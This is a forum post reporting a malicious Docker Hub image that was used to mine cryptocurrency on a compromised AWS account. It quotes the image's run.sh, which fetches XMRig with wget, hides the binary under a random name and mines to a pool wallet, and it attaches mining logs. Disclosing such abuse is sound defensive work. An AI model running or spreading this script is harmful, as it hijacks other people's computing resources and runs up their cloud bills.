Hello everyone, I would like to report a malicious image https://hub.docker.com/r/gdus1is/lo (also I see that account contains one more image which is probably created with the same purpose https://hub.docker.com/r/gdus1is/la)
The owner illegally accessed AWS account, created an extra API key and started using ECS service to mine cryptocurrency.
I have attached logs of this image and the run.sh file that is executed when the image is started.
run.sh
APP=app$(shuf -i 1000000-9999999 -n 1)
wget -q https://github.com/xmrig/xmrig/releases/download/v6.14.1/xmrig-6.14.1-linux-x64.tar.gz
tar -zxf xmrig-6.14.1-linux-x64.tar.gz
cd xmrig-6.14.1
mv xmrig $APP
chmod +x $APP
./$APP -a rx/0 -o us.zephyr.herominers.com:1123 -p x -t $(nproc --all) -u ZEPHs8EVgJXb6pqyj5mAc9E8z1Pu6feUYPZMXtprp6oQL8Z7qqQFiPwVv4d3UMuueAhrrcijPkMucWY4DG9aP2XAVZ8YTrNwMhB.gas1
Logs
2024-04-03 17:59:17 ABOUT XMRig/6.14.1 gcc/5.4.0
2024-04-03 17:59:17 LIBS libuv/1.41.0 OpenSSL/1.1.1k hwloc/2.4.1
2024-04-03 17:59:17 HUGE PAGES supported
2024-04-03 17:59:17 1GB PAGES unavailable
2024-04-03 17:59:17 CPU VirtualApple @ 2.50GHz (1) 64-bit AES
2024-04-03 17:59:17 L2:0.0 MB L3:0.0 MB 10C/10T NUMA:1
2024-04-03 17:59:17 MEMORY 1.3/7.7 GB (18%)
2024-04-03 17:59:17 DONATE 1%
2024-04-03 17:59:17 ASSEMBLY auto:intel
2024-04-03 17:59:17 POOL #1 us.zephyr.herominers.com:1123 algo rx/0
2024-04-03 17:59:17 COMMANDS hashrate, pause, resume, results, connection
2024-04-03 17:59:17 OPENCL disabled
2024-04-03 17:59:17 CUDA disabled
2024-04-03 17:59:17 [2024-04-03 17:59:17.772] net use pool us.zephyr.herominers.com:1123 15.204.46.117
2024-04-03 17:59:17 [2024-04-03 17:59:17.776] net new job from us.zephyr.herominers.com:1123 diff 240009 algo rx/0 height 221407
2024-04-03 17:59:17 [2024-04-03 17:59:17.777] cpu use argon2 implementation SSSE3
2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr msr kernel module is not available
2024-04-03 17:59:17 [2024-04-03 17:59:17.803] msr FAILED TO APPLY MSR MOD, HASHRATE WILL BE LOW
2024-04-03 17:59:17 [2024-04-03 17:59:17.805] randomx init dataset algo rx/0 (10 threads) seed 59789da41f0fcfc7...
2024-04-03 17:59:17 [2024-04-03 17:59:17.809] randomx allocated 2336 MB (2080+256) huge pages 0% 0/1168 +JIT (3 ms)
2024-04-03 17:59:23 [2024-04-03 17:59:23.164] randomx dataset ready (5356 ms)
2024-04-03 17:59:23 [2024-04-03 17:59:23.165] cpu use profile * (10 threads) scratchpad 2048 KB
2024-04-03 17:59:23 [2024-04-03 17:59:23.170] cpu READY threads 10/10 (10) huge pages 0% 0/10 memory 20480 KB (4 ms)
Hello everyone, I would like to report a malicious image https://hub.docker.com/r/gdus1is/lo (also I see that account contains one more image which is probably created with the same purpose https://hub.docker.com/r/gdus1is/la) The owner illegally accessed AWS account, created an extra API key and started using ECS service to mine cryptocurrency. I have attached logs of this image and the run.sh file that is executed when the image is started.
run.sh
Logs